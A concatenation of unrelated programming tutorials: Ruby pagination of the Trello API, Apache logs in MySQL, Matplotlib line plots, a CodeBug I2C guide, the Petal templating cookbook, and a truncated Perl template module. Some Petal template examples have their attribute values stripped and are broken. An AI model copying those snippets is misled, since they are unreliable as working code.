Now let's fetch some paginated data in Ruby. For the following examples, we'll be using Ruby 2.2. To make HTTP requests, we'll use the http.rb gem, but feel free to substitute your HTTP client of choice. Install the gem yourself with gem install http or add it to your Gemfile:

# Gemfile
gem "http"

To make things easier for the remainder, add the key and token as environment variables in your shell. 
For Mac/Linux users, something like this will work:

# command line
export TRELLO_APP_KEY=your-key
export TRELLO_APP_TOKEN=your-token

Now, let's run the Ruby version of our Trello World test.

# trello_eager.rb
require "http"

def app_key
  ENV.fetch("TRELLO_APP_KEY")
end

def app_token
  ENV.fetch("TRELLO_APP_TOKEN")
end

url = "https://api.trello.com/1/members/me?key=#{app_key}&token=#{app_token}"

puts HTTP.get(url).parse

If it worked correctly, you should see the same result we saw in your browser earlier. Let's extract a few helpers to build the url. We'll use Addressable::URI, which is available as a dependency of the http.rb gem as of version 1.0.0.pre1, or may otherwise be installed as gem install addressable or gem "addressable" in your Gemfile:

require "http"
require "addressable/uri"

def app_key
  ENV.fetch("TRELLO_APP_KEY")
end

def app_token
  ENV.fetch("TRELLO_APP_TOKEN")
end

def trello_url(path, params = {})
  auth_params = { key: app_key, token: app_token }
  Addressable::URI.new({
    scheme: "https",
    host: "api.trello.com",
    path: File.join("1", path),
    query_values: auth_params.merge(params)
  })
end

def get(path, params = {})
  HTTP.get(trello_url(path, params)).parse
end

Let's Paginate

Now we'll add an alternative method to #get that can handle pagination.

MAX = 1000

def paginated_get(path, options = {})
  params = options.dup
  before = nil
  max = params.delete(:max) { MAX }
  limit = params.delete(:limit) { 50 }
  results = []

  loop do
    data = get(path, { before: before, limit: limit }.merge(params))
    results += data
    break if (data.empty? || results.length >= max)
    before = data.last["id"]
  end

  results
end

Given a path and hash of parameter options, we'll build up an array of results by fetching the endpoint and requesting the next set of 50 before the last id of the previous set. Once either the max is reached or no more results are returned from the API, we'll exit the loop. As a starting point, this works nicely. We can simply use paginated_get to collect up to 1000 results for a given resource without the caller caring about pages. 
Here's how we can grab all the comments we've added to Trello cards:

def comments(params = {})
  paginated_get("members/me/actions", { filter: "commentCard" }.merge(params))
end

comments
#=> [{"id"=>"abcd", "idMemberCreator"=>"wxyz", "data"=> {...} ...}, ...]

The main problem with this approach is that it forces the results to be eager loaded. Unless a max is specified in the method call, we could be waiting for up to 1000 comments to load - 20 requests of 50 comments each - before the results are returned.

Stop, enumerate, and listen

The next step is to refactor our paginated_get method to take advantage of Ruby's Enumerator. I previously described Enumerator and showed how it can be used to generate infinite sequences in Ruby, including Pascal's Triangle. The main advantage of using Enumerator will be to give callers flexibility to work with the results, including filtering, searching, and lazy enumeration.

# trello_enumerator.rb
def paginated_get(path, options = {})
  Enumerator.new do |y|
    params = options.dup
    before = nil
    total = 0
    limit = params.delete(:limit) { 50 }

    loop do
      data = get(path, { before: before, limit: limit }.merge(params))
      total += data.length
      data.each do |element|
        y.yield element
      end
      break if (data.empty? || total >= MAX)
      before = data.last["id"]
    end
  end
end

We've got a few similarities with our first implementation. We still loop over repeated requests for successive pages until either the max is reached or no data is returned from the API. There are a few big differences though. First, you'll notice we've wrapped our expression in Enumerator, which will serve as the return value for #paginated_get. Using an enumerator may look strange, but it offers a huge advantage over our first iteration. Enumerators allow callers to interact with data as it is generated. Conceptually, the enumerator represents the algorithm for retrieving or generating data in Enumerable form. 
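For readers more at home in Python, the same lazy-pagination pattern can be sketched with a generator. The fetch_page callable here is a hypothetical stand-in for the Trello request, so the logic is testable without the network:

```python
from itertools import islice

def paginated_get(fetch_page, limit=50, max_results=1000):
    # fetch_page(before, limit) stands in for the HTTP call; it returns
    # the list of items that come before the given id.
    before = None
    total = 0
    while True:
        page = fetch_page(before, limit)
        for item in page:
            yield item          # hand each item to the caller as it arrives
        total += len(page)
        if not page or total >= max_results:
            break
        before = page[-1]["id"]

# Fake API: two pages of two items, then an empty page.
pages = [[{"id": 1}, {"id": 2}], [{"id": 3}, {"id": 4}], []]

def fake_fetch(before, limit):
    return pages.pop(0)

# Taking only three items fetches just the first two pages - lazy,
# like the Ruby Enumerator version.
result = list(islice(paginated_get(fake_fetch), 3))
print(result)  # [{'id': 1}, {'id': 2}, {'id': 3}]
print(pages)   # [[]] - the empty page was never requested
```

The generator plays the role of Enumerator.new: consumers pull items one at a time, and pages are only fetched when the iteration actually reaches them.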
An enumerator implements the Enumerable module, which means we can call familiar methods like #map, #take, and so on. Instead of building up an internal array of results, enumerators provide a mechanism for yielding each element even though a block may not be given to the method (how mind-blowing is that?). Now we can use enumerator chains to do something like the following, where we request comment data lazily, transform the API hash to comment text, and select the first two addressed to a colleague.

comments.lazy.
  map { |a| a["data"]["text"] }.
  select { |t| t.start_with?("@personIWorkWith") }.
  take(2).force

We may not need to load all 1000 results, because the enumerator chain is evaluated for each item as it is yielded. This technique provides the caller with a great deal of flexibility. Eager loading can be delayed or avoided altogether - a potential performance gain.

Here are the magic lines from #paginated_get:

data.each do |element|
  y.yield element
end

The y.yield is not the keyword yield, but the invocation of the #yield method of Enumerator::Yielder, an object the enumerator uses internally to pass values through to the first block used in the enumerator chain. For a more detailed look at how enumerators work under the hood, read more about how Ruby works hard so you can be lazy.

A cursor-y example

Let's do one more iteration on our #paginated_get refactoring. Up to this point, we've been using a "functional" approach; we've just been using a bunch of methods defined in the outermost lexical scope. First, we'll extract a Client responsible for sending requests to the Trello API and parsing the responses as JSON. 
# trello_client.rb
require "http"
require "addressable/uri"

class Client
  def initialize(opts = {})
    @app_key = opts.fetch(:app_key, ENV.fetch("TRELLO_APP_KEY"))
    @app_token = opts.fetch(:app_token, ENV.fetch("TRELLO_APP_TOKEN"))
  end

  def get(path, params = {})
    HTTP.get(trello_url(path, params)).parse
  end

  private

  def trello_url(path, params = {})
    auth_params = { key: @app_key, token: @app_token }
    Addressable::URI.new({
      scheme: "https",
      host: "api.trello.com",
      path: File.join("1", path),
      query_values: auth_params.merge(params)
    })
  end
end

Next, we'll provide a class to represent the paginated collection of results to replace our implementation of #paginated_get. The Twitter API uses cursors to navigate through pages, a concept similar to "next" and "previous" links on websites. Although Trello doesn't provide explicit cursors in their API, we can still wrap the paginated results in an enumerable class to get similar behavior.

# trello_cursor.rb
require_relative "./trello_client"

class Cursor
  def initialize(path, params = {})
    @path = path
    @params = params
    @collection = []
    @before = params.fetch(:before, nil)
    @limit = params.fetch(:limit, 50)
  end
end

The Cursor will be initialized with a path and params, like our paginated_get. We'll also maintain an internal @collection array to cache elements as they are returned from Trello.

class Cursor
  private

  def client
    @client ||= Client.new
  end

  def fetch_next_page
    response = client.get(@path, @params.merge(before: @before, limit: @limit))
    @last_response_empty = response.empty?
    @collection += response
    @before = response.last["id"] unless last?
  end

  MAX = 1000

  def last?
    @last_response_empty || @collection.size >= MAX
  end
end

We'll introduce a dependency on the Client to interface with Trello through the private client method. We'll use our client to fetch the next page, append the latest results to our cached @collection, and advance the before cursor past the last id we've seen. 
Now for the key public method:

class Cursor
  include Enumerable

  def each(start = 0)
    return to_enum(:each, start) unless block_given?

    Array(@collection[start..-1]).each do |element|
      yield(element)
    end

    unless last?
      start = [@collection.size, start].max
      fetch_next_page
      each(start, &Proc.new)
    end
  end
end

We've chosen to have our Cursor expose the Enumerable API by including the Enumerable module and implementing #each. This will give cursor instances enumerable behavior, so we can simply replace our paginated_get definition to return a new Cursor.

def paginated_get(path, params = {})
  Cursor.new(path, params)
end

def comments(params = {})
  paginated_get("members/me/actions", { filter: "commentCard" }.merge(params))
end

Let's break down Cursor#each a bit further. The first line allows us to retain the Enumerator behavior from before.

return to_enum(:each, start) unless block_given?

It invokes Kernel#to_enum when no block is given to an each method call. In this case, the method returns an Enumerator that packages the behavior of #each for an enumerator chain similar to before:

puts comments.each.lazy.
  map { |axn| axn["data"]["text"] }.
  select { |txt| txt.start_with?("@mgerrior") }.
  take(2).force

For more info on using #to_enum, check out Arkency's Stop including Enumerable, return Enumerator instead. We also need to yield each element in the @collection to pass elements to callers of #each

Array(@collection[start..-1]).each do |element|
  yield(element)
end

We iterate from the start of the collection to the end with Array(@collection[start..-1]).each... but wait! When we start iterating, the @collection is empty:

def initialize
  # ...
  @collection = []
end

Wat? The key comes in the lines that follow in #each:

unless last?
  start = [@collection.size, start].max
  fetch_next_page
  each(start, &Proc.new)
end

Unless we've encountered the last page, we fetch the next page, which appends the latest results to the collection, and we recursively invoke #each with a starting point. 
This means #each will be invoked again with new results until no new data is encountered. Sweet! A neat trick is how we forward the block given to #each. When we call Proc.new without explicitly passing a block or proc object, it will instantiate with the block given to its surrounding method if there is one. The behavior is similar to the following:

def each(start = 0, &block)
  # ...
  each(start, &block)
  # ...
end

The main benefit is that by omitting &block in the arguments, we don't needlessly instantiate a Proc object on every call. For more on this, read up on Passing Blocks in Ruby without &block.

"Recursive each" is a powerful technique for providing a seamless, enumerable interface to paginated or cursored results. I first encountered this approach in sferik's Twitter gem - a great resource for those considering writing an API wrapper in Ruby.

On your own

Give it a shot! Pick out an API you like to use and play with techniques for modeling its collection resources. This is a great way to get more experience with Ruby's Enumerable. Consider one of these approaches when you need to traverse paginated or partitioned subsets of data in an external or internal API. Think less about pages and more about data.

Changelog

2016-01-28

- Updated the examples to use the :before parameter instead of :page for requests for successive "pages"
- Posted the full source of the examples above on GitHub

Credits

Icons via the Noun Project:
https://rossta.net/blog/paginated-resources-in-ruby.html
Writing Apache's Logs to MySQL

Querying the Database

Queries can run on the database immediately. The examples below are in straight SQL syntax. Some use the nested query syntax available only in MySQL 4.1 or above. If you intend to write automated scripts in Perl or Python or whatever, it may be easier to run multiple SELECT statements or to compute derived values inside the scripting language itself. Whenever you request reports on web server performance, you'll need to specify the date range you want to cover.

Query: total bytes in and out

You want to find out how much network traffic your web server sends and receives. Keep in mind that this reflects traffic levels only at the application layer of the TCP/IP stack. It won't record the size of TCP or IP packets. That's a question SNMP polling tools can answer better.

select sum(bytesin), sum(bytesout) from blackbox
    where datetime = curdate();

select sum(bytesin), sum(bytesout) from blackbox
    where datetime >= date_sub(curdate(), interval 7 day);

The first example gives the total bytes in and bytes out for the given day. The second example gives the total for the past seven days.

Query: what percentage of hits goes to RSS syndication pages compared with HTML pages?

This example compares the number of hits against RSS pages with the number of hits against HTML pages.

select (select count(url) from blackbox where url regexp '\.rss$') /
       (select count(url) from blackbox where url regexp '\.html$');

RSS hits are typically automated. Because of this, a lot of sites have a higher percentage of pure robot/agent traffic on their site than they may have had two years ago. By checking the RSS hits, you can determine whether the agent traffic is overwhelming your site.

Query: how often do users skip the Flash animation?

If you see a web site with one of those Flash animations on the main page, it usually has a "Skip" link at the bottom. 
If you're going to include one, throw in a meaningless query string at the end of the link, so you can determine which hits are redirects after the animation has finished and which ones come from people clicking on the link.

select (select count(url) from blackbox where url="/home.html?skipped"),
       (select count(url) from blackbox where url="/home.html");

Verifying that the database is working

Here's a two-part script you can run to verify that the database really is logging hits from the servers. First, add this script to the cgi-bin directory of every web site that uses mod_log_mysql.

#!/usr/local/bin/perl
# returnid.pl

use strict;
use warnings;

print("X-ServerId: $ENV{'SERVERID'}\n");
print("X-UniqueId: $ENV{'UNIQUE_ID'}\n");
print "Content-type: text/plain\n\n";
print("Server id is $ENV{'SERVERID'}\n");
print("Unique id is $ENV{'UNIQUE_ID'}\n");

exit 0;

The server will return its serverid and unique ID for that particular hit. The next program will act as an HTTP client. It will retrieve this URL, then connect to the database and search the logs for the unique ID.

#!/usr/local/bin/perl
# checkid.pl

#
# Pragmas
#
use strict;
use warnings;

#
# Includes
#
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use DBI;

#
# Global Variables
#
use vars qw/$Url $Agent $Db $ServerId $UniqueId /;

use constant {
    DSN         => "DBI:mysql:database=apachelog",
    DBUSER      => "logwriter",
    DBPASS      => "logpass",
    QUERYSTRING => "select datetime,uniqueid from blackbox where uniqueid=? and serverid=?",
    DEFAULTURL  => "",
};

#
# Subroutines
#
sub getId {
    my ($agent,$url) = @_;
    my $request = HTTP::Request->new(GET => $url);
    my $response = $agent->request($request);
    if ($response->is_success) {
        my $serverid=$response->header("X-ServerId");
        my $uniqueid=$response->header("X-UniqueId");
        print("Unique ID from server is $uniqueid\n");
        print("Server ID is $serverid\n");
        return ($serverid,$uniqueid);
    }
    return;
}

sub findId {
    my ($db,$serverid,$uniqueid) = @_;
    my $query = $db->prepare(QUERYSTRING);
    $query->execute($uniqueid,$serverid);
    if (my ($dt,$uid)=$query->fetchrow_array()) {
        print("Database recorded $uid at $dt\n");
    } else {
        print("Can't find a database record for unique-id $uniqueid\n");
    }
    return;
}

#
# Main Block
#

# Initialize the user agent
$Agent = LWP::UserAgent->new();

# Initialize the database client
$Db = DBI->connect(DSN,DBUSER,DBPASS);

# URL
$Url = shift || DEFAULTURL;

if (($ServerId,$UniqueId) = getId($Agent,$Url)) {
    findId($Db,$ServerId,$UniqueId);
} else {
    print("Unable to get data from webserver");
    exit 1;
}

If you run this program at a regular polling interval, it will warn you when the remote database is not responding or if the Blackbox table is not recording hits from the web servers.

Final Thoughts

If you've read the first article, you should already understand why you want to log your server performance data. The core concepts are still the same; I'm just introducing a few variations on improving the process. The two new logging directives provide more flexibility with virtual hosting environments. It also allows having just one Blackbox log file for each running server. If you want to take the really big step, consider the option of writing your logs straight to a database. The initial setup process may be complex, but after that there is a huge administrative benefit. It's an ideal solution for dealing with large server farms.

Chris Josephes works as a system administrator for Internet Broadcasting. 
Return to the Apache DevCenter.
http://www.onlamp.com/pub/a/apache/2005/02/10/database_logs.html?page=3&x-order=date&x-maxdepth=0
Line Plots using Matplotlib

- Mar 4
- Key Terms: line plot, datetime

Import Modules

import matplotlib.pyplot as plt
from datetime import datetime
%matplotlib inline

Generate a Simple Line Plot

We call the plot method and must pass in at least two arguments: the first is our list of x-coordinates, and the second is our list of y-coordinates.

plt.plot([1, 2, 3, 4], [1, 2, 3, 4]);

We plotted 4 points with a line connected through them.

Generate a Line Plot from My Fitbit Activity Data

More often, you'll be asked to generate a line plot to show a trend over time. Below is my Fitbit activity of steps for each day over a 15 day time period.

dates = ['2018-02-01', '2018-02-02', '2018-02-03', '2018-02-04', '2018-02-05',
         '2018-02-06', '2018-02-07', '2018-02-08', '2018-02-09', '2018-02-10',
         '2018-02-11', '2018-02-12', '2018-02-13', '2018-02-14', '2018-02-15']

steps = [11178, 9769, 11033, 9757, 10045, 9987, 11067, 11326, 9976, 11359,
         10428, 10296, 9377, 10705, 9426]

Convert Strings to Datetime Objects

In our plot, we want dates on the x-axis and steps on the y-axis. However, Matplotlib cannot plot the strings in our dates list directly. We must convert the dates from strings into datetime objects.

Code Explanation

We'll first assign the variable dates_list to an empty list, then append our newly created datetime objects to it as we iterate over all elements in our original dates list of string values. For each item in our list, we'll access the strptime method in our datetime module and pass in two arguments. The first argument is our date - an item in our list. The second argument is the datetime format. Notice how our dates originally provided are in the format year-month-day with zero-padded month and day values. This means the 2nd of the month is 02 rather than just 2. Therefore, we must tell the strptime method this format with %Y for year, %m for month and %d for day. 
dates_list = []
for date in dates:
    dates_list.append(datetime.strptime(date, '%Y-%m-%d'))

We can preview our first datetime object.

dates_list[0]
datetime.datetime(2018, 2, 1, 0, 0)

Our elements are of type datetime from the datetime module. Therefore, the type is datetime.datetime.

type(dates_list[0])
datetime.datetime

Plot Line Plot of New Data

plt.figure(figsize=(10, 8))
plt.plot(dates_list, steps);

By default, Matplotlib labels the smallest y-tick at 9500 instead of simply 0, so we can see more of the variation in steps per day. I also called the figure method and passed in a larger than normal figure size so we could easily see the y-tick values.
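The conversion loop can also be written as a list comprehension. A quick sketch of the round trip, independent of the plotting itself (using a shortened dates list for brevity):

```python
from datetime import datetime

dates = ['2018-02-01', '2018-02-02', '2018-02-03']

# Same conversion as the loop above, in one line.
dates_list = [datetime.strptime(d, '%Y-%m-%d') for d in dates]

print(dates_list[0])                       # 2018-02-01 00:00:00
print(dates_list[0].strftime('%Y-%m-%d'))  # round-trips back to the string
```

strftime is the mirror image of strptime, which is handy later when you want to label ticks with a custom date format.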
https://dfrieds.com/data-visualizations/line-plots-python-matplotlib
Raspberry Pi Controlled Codebug With I2C

Introduction

Set up Tethered mode

For Tethered mode you need to load your CodeBug with a special project file. This is downloaded to CodeBug just the same as a regular user program (refer to the download guide for details). Download this I2C Tether mode project and load it onto your CodeBug.

Fitting CodeBug to Raspberry Pi

Look out! Never connect the Micro USB or use a battery with CodeBug while it is fitted to a Raspberry Pi.

CodeBug connects straight to Raspberry Pi's GPIO header through CodeBug's expansion connector. While your Pi is disconnected from power, align CodeBug to the pins shown in the diagrams below and gently push CodeBug's connector onto the GPIO pins. Choose your matching Raspberry Pi model. If you are still unsure which Raspberry Pi GPIO pins to connect CodeBug to, note the pin labels on the back of CodeBug, and connect these to the corresponding pins on your Raspberry Pi. You can now power up your Raspberry Pi.

Enable Raspberry Pi I2C

First, make sure you have enabled I2C by opening a Terminal window and running

sudo raspi-config

and then choose Advanced Options > I2C, then select Yes for both questions.

Python libraries for Raspberry Pi

You must now install the Python libraries that will talk to your CodeBug using the I2C GPIO pins. In your Terminal window, type

sudo apt-get update
sudo apt-get install python3-codebug-i2c-tether

Test with an example

Creating Tethered CodeBug programs

You can write your own Tethered CodeBug programs using Python and a few simple commands to control your CodeBug. In the next steps you will start an interactive Python session and enter commands to interact with your tethered CodeBug. Open a Terminal and type

python3

You will see the Python prompt appear (>>>). Now import the CodeBug I2C library and connect by entering

import codebug_i2c_tether
cb = codebug_i2c_tether.CodeBug()
cb.open()
cb.set_pixel(2, 2, 1)

You will see the center LED light up on CodeBug. 
Write text on the CodeBug’s LEDs using the command

cb.write_text(0, 0, 'A')

An A will appear on the CodeBug LEDs. To write scrolling text on the CodeBug’s LEDs, first import the time module:

import time

You can now scroll text using the commands. Press Ctrl+D to exit Python.

What next?

You can get a full list of the commands available by typing the following into your interactive Python shell, with the codebug_i2c_tether library imported:

help(codebug_i2c_tether.CodeBug)

Write long programs for Tethered mode CodeBug by writing commands in your text editor and saving and running the file in the way you did with the examples earlier (python yourfile.py). Tethered mode gives your CodeBug access to the full computing power, functionality and network connectivity of your Raspberry Pi! Make the most of the variety of powerful yet easy-to-use Python modules that allow your CodeBug to generate random numbers, create email alerts or even post to Twitter!
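To turn scrolling into a saved program, one approach is to redraw the message at decreasing x offsets with a short delay between frames. This is only a sketch: the `scroll_positions` helper and its 6-column character width are assumptions for illustration, not part of the documented codebug_i2c_tether API (check `help(codebug_i2c_tether.CodeBug)` for the real options).

```python
import time

def scroll_positions(message, display_width=5, char_width=6):
    """X offsets that walk a message across the 5x5 display, right to left.

    char_width is an assumption (5 LED columns per glyph plus a one-column
    gap); adjust it to match the real font metrics of your CodeBug library.
    """
    start = display_width               # text starts just off the right edge
    end = -len(message) * char_width    # ...and finishes off the left edge
    return list(range(start, end - 1, -1))

def scroll(cb, message, delay=0.1):
    """Scroll a message on a tethered CodeBug; cb is an opened CodeBug()."""
    for x in scroll_positions(message):
        cb.write_text(x, 0, message)    # redraw the text shifted one column left
        time.sleep(delay)
```

Calling `scroll(cb, 'Hello')` after the `cb.open()` shown above would then sweep the text across the display.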
https://www.codebug.org.uk/learn/activity/62/raspberry-pi-controlled-codebug-with-i2c/
Petal::Cookbook - Recipes for building templates with Petal

This document contains some examples of Petal template usage. Most of these examples deal with using Petal to generate HTML files from HTML templates.

When using Petal for web application development, your templates should not need to be accessible by the webserver. In fact, it could be a security risk if they are available since there may be code or comments which users should not see prior to processing by Petal. Thus, it is recommended to store your templates in a non-web-accessible directory. Personally I prefer to place the directory outside of the web root but you could also use permissions or .htaccess files to control access to the directory. This directory path should go into the $Petal::BASE_DIR global setting or the 'base_dir' argument for the new() constructor.

Petal is indifferent about the name of the template files. Personally, I like to name my templates with the .tmpl extension to help myself and designers distinguish templates from static html. Some GUI editors, though, will not open files without a htm/html extension (esp. under Windows).

If you are getting a parse_error when trying to process your template, you will need to clean up your XHTML template in order for Petal to process it. Two tools will be of great assistance in taking the step towards better standards compliance: HTML Tidy and xmllint. In addition, you can use the page validation services at W3C. Alternatively, you could use the Petal::Parser::HTB module which will parse non-well-formed HTML documents using HTML::TreeBuilder.

HTML Tidy will rewrite your document into valid XHTML and, if requested, even replace legacy formatting tags with their CSS counterparts. You can safely ignore the warnings about proprietary attributes. Be sure to read the output of what HTML Tidy is doing or else you may find it removing important tags which it thinks are empty or invalid (e.g., inline elements outside of a block).
One of the important options that should be set is output_xhtml (-asxhtml from the command-line). Here's an example of how to use it (see the documentation for complete details):

tidy -asxhtml original_file.html > new_file.html

Once your document is well-formed, you can use xmllint to do day-to-day checking that it stays well-formed without having to wade through the warnings that HTML Tidy will generate about proprietary attributes. The following command will check that a document is well-formed:

xmllint --noout <filename>

To prevent errors about undefined namespace prefixes, be sure to include these in your template like so:

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:tal="http://purl.org/petal/1.0/">

You may receive errors from xmllint about unknown entities such as &nbsp;. These can be safely ignored, though you can use the numeric version &#160; instead to keep xmllint happy. If you find a way to suppress these warnings, please let us know. In the meantime, you can pass the output through grep to ignore these bogus warnings:

xmllint --noout tmpl/contact_info.tmpl 2>&1 | grep -v 'Entity'

Now you have no excuse for not creating well-formed XHTML documents.

An effective way to collate data to send to the Petal process command is via a hash reference. Used as follows, this technique allows you to build up your data to be passed to the template slowly:

my $hash = { string => 'Three', 'number' => 3 };
$hash->{'foo'} = "bar";

my $template = new Petal ( 'test.tmpl' );
my $html = $template->process($hash);

# Output the results
print "Content-type: text/html\n\n";
print $html;

One way to use tal:repeat is to create a reference to an array of anonymous hashes. Here is an example:

my $array_ref = [
    { firstname => "David", surname => "Lloyd" },
    { firstname => "Susan", surname => "Jones" },
];

With this array you can use the tal:repeat structure.
Let's say you have this template - this is a snippet so don't forget the proper name space declarations and such:

<table>
  <tr>
    <th>First Name</th>
    <th>Last Name</th>
  </tr>
  <tr tal:repeat="name list_of_names">
    <td tal:content="name/firstname">First Name</td>
    <td tal:content="name/surname">Last Name</td>
  </tr>
</table>

If you processed that template and the method call "list_of_names" returned an array reference as described above, you'd get:

<table>
  <tr>
    <th>First Name</th>
    <th>Last Name</th>
  </tr>
  <tr>
    <td>David</td>
    <td>Lloyd</td>
  </tr>
  <tr>
    <td>Susan</td>
    <td>Jones</td>
  </tr>
</table>

So, in a tal:repeat construct:

tal:repeat="tal_variable_name EXPRESSION"

tal_variable_name is the name of the variable you use in your tal template to refer to each row of data you are looping through. EXPRESSION should return an array reference, where each row is an anonymous hash, array, scalar or object. You can then refer to the members of the anonymous hash like this:

"$tal_variable_name/key_from_hash"

Up until now, if I wanted to use petal to pre-select an item in a selectbox, I would have to do each item twice, like so:

<select>
  <div petal:repeat="option options">
    <option petal:condition="true:option/selected" selected="selected"
            petal:attributes="value option/value"
            petal:content="option/label">Option 1</option>
    <option petal:condition="false:option/selected"
            petal:attributes="value option/value"
            petal:content="option/label">Option 2</option>
  </div>
</select>

$VAR1 = [
    { value => 1, label => 'Option 1', selected => 1 },
    { value => 2, label => 'Option 2', selected => 0 },
    { value => 4, label => 'Option 3', selected => 0 },
];

After reading the Petal source, I found that if you use petal:attributes to assign an attribute an undefined value, the attribute gets omitted, thus the above code can be replaced with the simpler version below:

<select>
  <option petal:repeat="option options"
          petal:attributes="value option/value; selected option/selected"
          petal:content="option/label">Option 1</option>
</select>

$VAR1 = [
    { value => 1, label => 'Option 1', selected => 1 },
    { value => 2, label => 'Option 2' },
    { value => 4, label => 'Option 3' },
];

It turns out that although not documented in Petal's documentation, this behavior is part of the TAL specification. Thanks to Fergal Daly for his knowledge of the TAL specification.

I developed a decode: modifier that works similarly to Oracle's decode statement.
It provides an if/then/else construct and is part of the Petal::Utils collection of modifiers. Using decode, making even/odd rows of a table different classes, which allows you to do things like alter color, font size, etc., is relatively easy. Example:

<table>
  <tr tal: <td tal:Employee Name</td>
  ...
  </tr>
</table>

See Petal::Utils for more information.

Alternatively, this can be done entirely with TAL (contributed by Jonathan Vanasco):

<div tal: <tag tal:<tag tal:</tag> <tag tal:<tag tal:</tag> <div tal:

This will use either the rowEven or rowOdd class. All of the 'tag' elements are omitted on render. This uses a nested define tag in a condition tag, because define precedes condition in order of operations.

</div> <div>

The simplest way to do odd/even rows may be to duplicate the code entirely for each type of row, though this may cause maintenance headaches:

<table>
  <tr tal: <td tal:Employee Name</td>
  <td tal:Employee Name</td>
  ...
  </tr>
</table>

Petal supports the ability to call an object's methods if passed in to Petal::process via the %hash. Say you wish to check whether a particular record is contained in a recordset returned from an SQL query. Using OO-Perl techniques, you could use the following technique as described by Jean-Michel. Let's say that the database table looks like this:

Raters (id, first_name, last_name, relation, phone, email)

You could bless each record into a package as is:

use MyApplication::Record::Rater;
my @records = complicated_query_somewhere_else();
bless $_, "MyApplication::Record::Rater" for (@records);
$hash->{'records'} = \@records;

Your module could look like that:

package MyApplication::Record::Rater;
use strict;
use warnings;
use CGI;
use Carp;

sub is_current_id {
    my $self = shift;
    my $cgi = CGI->new;
    my $id = $cgi->param ('rater.id');
    return unless (defined $id and $id and $id =~ /^\d+$/);
    return $id == $self->{id};
}

1;

Then on top of your existing data, you have a method which you can call from Petal, i.e.
<ul petal:repeat="record records">
  <li petal:condition="true:record/is_current_id">Current id</li>
</ul>

This trick can also be used when you have foreign keys in database fields.

<fictious_scenario>

For example, let's imagine that you have a column called 'friend_id'. It references another 'rater' which is supposed to be a friend of that person. You could define the following subroutine:

# give me the friend record for that person
sub friend {
    my $self = shift;
    my $friend_id = $self->{friend_id};
    my $sql = 'select * from rater where id = ?';
    my $sth = $::DBH_CONNECTION->prepare_cached ($sql);
    $sth->execute ($friend_id);
    my $hash = $sth->fetchrow_hashref;
    return unless (defined $hash);
    bless $hash, "MyApplication::Record::Rater";
    return $hash;
}

Then in your template, you could do:

<div petal:condition="true:record/friend">
  Your friend is: <span petal:content="record/friend/first_name">First Last</span>
</div>

</fictious_scenario>

Thanks to Jean-Michel Hiver for this tip.

If you are doing a lot of database manipulation via Petal, you probably should consider an object-relational mapping library. Personally, I recommend Class::DBI. There is a list of many of these tools at Perl Object Oriented Persistence.

Calling the HTML generating methods of CGI.pm from the Petal template provides an extremely simple means to develop forms. For example, the usual rat's nest of loops used to populate a checkbox group can be replaced by the simple and elegant construct below. You can put in a dummy checkbox to give the HTML designer something to look at. Be sure to call CGI with the -compile option as follows:

use CGI qw(-compile :all);
$hash->{'query'} = new CGI;
$hash->{'choices'} = [1, 2, 3, 4];

<span petal: <input name="Choices" type="checkbox" value="test">Test</input> </span>

Thanks to Kurt Stephens for this tip.

This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.

William McKee <william@knowmad.com>. Thanks to the following contributors: Jean-Michel Hiver, Kurt Stephens, Warren Smith, Fergal Daly.
Petal, Petal::Utils, the test file t/084_Cookbook.t and the test template t/data/cookbook.html.
http://search.cpan.org/~bpostle/Petal-2.19/lib/Petal/Cookbook.pod
package TemplateObject;

use strict;
use Tracer;
use PageBuilder;
use FIG_CGI;
use FigWebServices::SeedComponents::Framework;

=head1 Template Object Manager

=head2 Introduction

The template object manager is used to build HTML in the presence or absence of a template. The constructor looks for a template and remembers whether or not it found one. To add HTML to the object, you call the L</add> method with a variable name and the HTML to add. The example below puts the results of the C<build_html> method into the template C<$to> with the name C<frog>.

$to->add(frog => build_html($thing));

Once all the HTML is added, you call finish to generate the web page.

print $to->finish();

If no template exists, the HTML will be output in the order in which it was added to the template object. If a template does exist, the HTML assigned to each name will be substituted for the variable with that name. Sometimes extra text is needed in raw mode. If you code

$to->add($text);

the text is discarded in template mode and accumulated in raw mode. If you're doing complicated computation, you can get a faster result using an IF construct.

$to->add(build_html($data)) if $to->raw;

This bypasses the call to C<build_html> unless it is necessary. The template facility used is the PERL C<HTML::Template> facility, so anything that follows the format of that facility will work. The most common use of the facility is simple variable substitution. In the fragment below, the variable is named C<topic>.

<p>This page tells how to do <TMPL_VAR NAME=TOPIC>.

If the following call was made at some point prior to finishing

$to->add(topic => "subsystem annotation");

The result would be

<p>This page tells how to do subsystem annotation.

Almost all templates are stored in files. Some are stored in the server's file system and some are stored on remote servers. Regardless of the location, a template file name consists of a base name followed by C<_tmpl>, an optional request code, and the template type as a suffix.
The following constructor starts the template for the protein page.

my $to = TemplateObject->new($cgi, php => 'Protein', $cgi->param('request'));

If the CGI object indicates Sprout is active, the template object will look for a template file at the C<$FIG_Config::template_url> directory. If no template URL is specified, it will look for the template file in the C<$FIG_Config::fig/CGI/Html> directory. The template file is presumed to have a type suffix of C<php>. If the template is coming from a web server, any include files or other PHP commands will already have been executed by the time the file reaches us. If the template is coming from the file system, the suffix has no operational effect: the template file is read in unaltered.

=cut

#: Constructor TemplateObject->new();

=head2 Public Methods

=head3 new

C<< my $to = TemplateObject->new($cgi, $type => $name, $request); >>

Construct a new template object for the current script. Currently, only Sprout uses templates. A template name consists of a base name followed by C<_tmpl>, an optional request code, and the template type as a suffix.

=over 4

=item cgi

CGI object for the current script.

=item type

Template type, usually either C<php> or C<html>. The template type is used as the file name suffix.

=item name

Base name of the template.

=item request (optional)

Request code for the script. If specified, the request code is joined to the base name to compute the template name.

=back

=cut

sub new {
    # Get the parameters.
    my ($class, $cgi, $type, $name, $request) = @_;
    # Declare the template name variable.
    my $template = "";
    # Check for Sprout mode.
    if (is_sprout($cgi)) {
        # Here we're in Sprout, so we have a template. First, we compute
        # the template name.
        my $requestPart = ($request ? "_$request" : "");
        $template = "${name}_tmpl$requestPart.$type";
        # Now we need to determine the template type and prefix the source location
        # onto it.
        if ($FIG_Config::template_url) {
            $template = "$FIG_Config::template_url/$template";
        } else {
            $template = "<<$FIG_Config::fig/CGI/Html/$template";
        }
    }
    # Now $template is either a null string (FALSE) or the name of the
    # template (TRUE). We are ready to create the return object.
    my $retVal = {
        template => $template,
        cgi => $cgi,
    };
